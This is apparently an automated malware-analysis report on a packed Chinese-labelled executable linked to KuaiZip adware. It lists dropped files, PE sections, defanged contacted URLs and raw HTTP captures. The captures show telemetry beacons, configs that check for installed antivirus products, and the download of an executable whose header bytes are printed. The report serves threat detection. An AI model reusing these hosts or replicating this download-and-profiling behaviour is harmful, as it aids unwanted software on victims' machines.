%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\6da25678gw1f1l8xa7bhsj20c80gbu12[1].jpg (648672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\uc2[1] (947341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\uc3[1] (547626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1la7wjwlnj20c80gbnpj[1].jpg (787198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\uc1[1] (911426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l8knvnatj20c80gbu12[1].jpg (680643 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (39245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll (36078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\modern-header.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\FileInfo.dll (4992 bytes)
%Program Files%\Common Files\System\safemonn32.dll (180 bytes)
%Program Files%\Common Files\System\config.dat (143 bytes)
%Program Files%\Common Files\System\safe.dat (3719 bytes)
%Program Files%\Common Files\System\OverlayIcon.dll (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.dat (3719 bytes)
C:\unit.bat (103 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: tongkangzhao
Product Name: chunfeidi
Product Version: 7.6.3.2
Legal Copyright: tongkangzhao ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.6.3.2
File Description: zhaopingnangdc
Comments: ciaozhao
Language: Chinese (Simplified, PRC)
Company Name: tongkangzhaoProduct Name: chunfeidiProduct Version: 7.6.3.2Legal Copyright: tongkangzhao ????Legal Trademarks: Original Filename: Internal Name: File Version: 7.6.3.2File Description: zhaopingnangdcComments: ciaozhaoLanguage: Chinese (Simplified, PRC)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 872448 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 876544 | 442368 | 441344 | 5.4993 | abe4466df29b7dee3ac4e2782b4b159b |
.rsrc | 1318912 | 32768 | 31744 | 3.18519 | 1d0c735ae770ae47fa8b7888852e991d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg | |
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg | |
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg | |
hxxp://180.149.135.224/RGHZx7C | |
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg | |
hxxp://opt.ecoma.ourwebpic.com/n/report/report.txt | |
hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4= | 123.59.80.92 |
hxxp://tj.kpzip.com/kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM= | 123.59.80.92 |
hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l | 123.59.80.92 |
hxxp://stat.kpzip.com/stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516 | 180.150.186.16 |
hxxp://z.gds.cnzz.com/stat.htm?id=1256550373 | |
hxxp://tj.kpzip.com/kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw== | 123.59.80.92 |
hxxp://tj.kpzip.com/kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ== | 123.59.80.92 |
hxxp://opt.ecoma.ourwebpic.com/n/report/queryinfo.xml | |
hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA= | 123.59.80.92 |
hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA= | 123.59.80.92 |
hxxp://opt.ecoma.ourwebpic.com/n/report/shortcut.xml | |
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240 | |
hxxp://z13.cnzz.com/stat.htm?id=1256550373 | 1.122.192.16 |
hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg | 83.169.205.18 |
hxxp://ww1.sinaimg.cn/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg | 83.169.205.8 |
hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg | 83.169.205.18 |
hxxp://ww4.sinaimg.cn/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg | 151.249.89.195 |
hxxp://i.kpzip.com/n/report/queryinfo.xml | 87.245.198.83 |
hxxp://i.kpzip.com/n/report/report.txt | 87.245.198.83 |
hxxp://i.kpzip.com/n/report/shortcut.xml | 87.245.198.83 |
hxxp://t.cn/RGHZx7C |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /stat.htm?id=1256550373 HTTP/1.1
Referer: hXXp://z13.cnzz.com/stat.htm?id=1256550373
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: z13.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 11 Apr 2016 17:53:13 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Thu, 16 Apr 2015 02:22:34 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /RGHZx7C HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Location: hXXp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 246
Date: Mon, 11 Apr 2016 17:52:41 GMT
X-Varnish: 786126080
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="http://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg">here</A>..</BODY>.</HTML>.HTTP/1.1 302 Found..Location: http://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg..Content-Type: text/html;charset=UTF-8..Server: weibo..Content-Length: 246..Date: Mon, 11 Apr 2016 17:52:41 GMT..X-Varnish: 786126080..Age: 0..Via: 1.1 varnish..Connection: keep-alive..<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="hXXp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg">here</A>..</BODY>.</HTML>...
GET /n/report/shortcut.xml HTTP/1.1
Host: i.kpzip.com
Accept: */*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 03:18:21 GMT
Date: Mon, 11 Apr 2016 03:18:21 GMT
Server: nginx/1.4.1
Content-Type: text/xml
Content-Length: 253
Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT
ETag: "56c532cd-fd"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou185:8080 (Cdn Cache Server V2.0), 1.1 db77:4 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<shortcut>. <simplerule type="url" name=".......url"/>. <simplerule type="url" name="..........url"/>. <simplerule type="url" name=".......url"/>. <simplerule type="url" name=".......url"/>.</shortcut>..
POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:24 GMT
c..{"status":1}..0..
GET /n/report/report.txt HTTP/1.1
Host: i.kpzip.com
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Accept:*/*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 14:44:02 GMT
Date: Mon, 11 Apr 2016 14:44:02 GMT
Server: nginx/1.4.1
Content-Type: text/plain
Content-Length: 131
Last-Modified: Tue, 22 Mar 2016 03:04:47 GMT
ETag: "56f0b64f-83"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 db78:9 (Cdn Cache Server V2.0)
Connection: keep-alive
[config].URL=hXXp://tj.kpzip.com..[DefaultOpenSoft-].Compress=HKEY_CLASS_ROOT\.zip.Browser=HKEY_CLASS_ROOT\http\shell\open\command...
GET /n/report/queryinfo.xml HTTP/1.1
Host: i.kpzip.com
Accept: */*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 02:44:13 GMT
Date: Mon, 11 Apr 2016 02:44:13 GMT
Server: nginx/1.4.1
Content-Type: text/xml
Content-Length: 2845
Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT
ETag: "56c532cd-b1d"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
...<?xml version="1.0" encoding="utf-8"?>..<TheQueryInfo>...<QueryProbability value="1000/1000"></QueryProbability>...<QueryList>....<QueryItem>.....<QueryName>2345haozip</QueryName>.....<HKeyLocalMachineUninstallDisplayName>2345......</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>360zip</QueryName>.....<HKeyLocalMachineUninstallDisplayName>360......</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>7z</QueryName>.....<HKeyLocalMachineUninstallDisplayName>7-Zip</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>WinRAR</QueryName>.....<HKeyLocalMachineUninstallDisplayName>WinRAR</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>360AQWS</QueryName>.....<HKeyLocalMachineUninstallDisplayName>360............</HKeyLocalMachineUninstallDisplayName>.....<HKeyLocalMachineServicesDisplayName>............</HKeyLocalMachineServicesDisplayName>.....<HKeyLocalMachineServicesChildKeyName>ZhuDongFangYu</HKeyLocalMachineServicesChildKeyName>....</QueryItem>....<QueryItem>.....<QueryName>QQGJ</QueryName>.....<HKeyLocalMachineUninstallDisplayName>............</HKeyLocalMachineUninstallDisplayName>.....<HKeyLocalMachineServicesD
<<< skipped >>>
GET /n/report/report.txt HTTP/1.1
Host: i.kpzip.com
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Accept:*/*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 14:44:02 GMT
Date: Mon, 11 Apr 2016 14:44:02 GMT
Server: nginx/1.4.1
Content-Type: text/plain
Content-Length: 131
Last-Modified: Tue, 22 Mar 2016 03:04:47 GMT
ETag: "56f0b64f-83"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 db78:9 (Cdn Cache Server V2.0)
Connection: keep-alive
[config].URL=hXXp://tj.kpzip.com..[DefaultOpenSoft-].Compress=HKEY_CLASS_ROOT\.zip.Browser=HKEY_CLASS_ROOT\http\shell\open\command...
POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:13 GMT
c..{"status":1}..0..
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:21:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="bjzy3"
Accept-Ranges: bytes
x-cdmi-object-size: 2198528
x-cdmi-create-time: 2016-03-13 14:08:34
Content-Length: 2198528
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.:.=.T.=.T.=.T..D..x.T..D.. .T..D....T.4...8.T.4...2.T.=.U...T..i..-.T..i..<.T.=...<.T..i..<.T.Rich=.T.................PE..L......V.....................H......m.............@..........................."...........@.................................8e..d.......`l...................P!.."..`...8............................G..@............................................text............................... ..`.rdata..............................@..@.data....f...p.......\..............@....rsrc...`l.......n...z..............@..@.reloc..f....P!....... .............@..B........................................................................................................................................................................................................................................................................................................................................U..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^].U..V........E..t.V..........^]..................................U..j.h..B.d.....P.....rC.3..E.VWP.E.d........}.j..u.......E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E.P.C......h.ZC..E.P.E...C..[V..WV.Q.........M.d......Y_^.M.3........]....V..V.p....F,.....t.P.........F,.....F$..t.P.........F$.....F...t.P.........F......F...t.P.........F......F...t.P.h.......F......F...t.P
<<< skipped >>>
POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:51:52 GMT
c..{"status":1}..0..
POST /kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:12 GMT
c..{"status":1}..0..
GET /large/6da25678gw1f1l8knvnatj20c80gbu12.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww3.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:22 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1013.v0-voz ( h0-s1008.v0-voz), ms h0-s1008.v0-voz ( h0-s1326.p0-kix), ht-d h0-s1326.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Sat, 02 Jul 2016 16:05:12 GMT
Age: 697630
Accept-Ranges: bytes
Content-Length: 7238736
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189
Connection: keep-alive
......JFIF.............C....................................................................C.......................................................................K....".........................................L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&45c....................................;.......................!..1.."AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C.$.....\.... .[..$J....E.]/.h@E.N...$ y.d.HjSX.d.).P...>in.@.&. <....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.&....4JjWM../$..).;.....4.$..PG..BKt.@A...u.@..#..=...."....M...\.B.....I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.]1.Hl..@.c..:..@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H .@B....d?$....7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#. ..[......RCr...6..d.....D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p..^.%.... ...t.c.........BJW@n.M...Ct...h.A-.D.].B..d...J.A-.$..mR..._..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.?.UtG.B....!u.b<}GF.d.H..V.D.:.@E.6S...:jx..el......m....Mp.].s
<<< skipped >>>
GET /large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww3.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:41 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1013.v0-voz ( h0-s1012.v0-voz), ms h0-s1012.v0-voz ( h0-s1346.p0-kix), ht-d h0-s1346.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Sun, 03 Jul 2016 13:39:51 GMT
Age: 619971
Accept-Ranges: bytes
Content-Length: 7238736
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189
Connection: keep-alive
......JFIF.............C....................................................................C.......................................................................K....".........................................L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&45c....................................;.......................!..1.."AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C.$.....\.... .[..$J....E.]/.h@E.N...$ y.d.HjSX.d.).P...>in.@.&. <....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.&....4JjWM../$..).;.....4.$..PG..BKt.@A...u.@..#..=...."....M...\.B.....I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.]1.Hl..@.c..:..@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H .@B....d?$....7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#. ..[......RCr...6..d.....D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p..^.%.... ...t.c.........BJW@n.M...Ct...h.A-.D.].B..d...J.A-.$..mR..._..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.?.UtG.B....!u.b<}GF.d.H..V.D.:.@E.6S...:jx..el......m....Mp.].s
<<< skipped >>>
GET /large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: ww1.sinaimg.cn
HTTP/1.1 200 OK
Date: Mon, 11 Apr 2016 17:52:23 GMT
Server: PWS/8.1.36
X-Px: ms h0-s1005.v0-voz ( h0-s1001.v0-voz), ms h0-s1001.v0-voz ( h0-s1345.p0-kix), ht-d h0-s1345.p0-kix.cdngp.net
Cache-Control: max-age=7776000
Expires: Thu, 02 Jun 2016 16:11:40 GMT
Age: 3289243
Accept-Ranges: bytes
Content-Length: 8045184
Content-Type: image/jpeg
Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT
X-Via-CDN: f=TXCDN,s=83.169.205.8,c=37.57.16.189
Connection: keep-alive
......JFIF.............C....................................................................C.......................................................................K....".........................................L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&45c....................................;.......................!..1.."AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C.$.....\.... .[..$J....E.]/.h@E.N...$ y.d.HjSX.d.).P...>in.@.&. <....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.&....4JjWM../$..).;.....4.$..PG..BKt.@A...u.@..#..=...."....M...\.B.....I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.]1.Hl..@.c..:..@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H .@B....d?$....7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#. ..[......RCr...6..d.....D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p..^.%.... ...t.c.........BJW@n.M...Ct...h.A-.D.].B..d...J.A-.$..mR..._..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.?.UtG.B....!u.b<}GF.d.H..V.D.:.@E.6S...:jx..el......m....Mp.].s
<<< skipped >>>
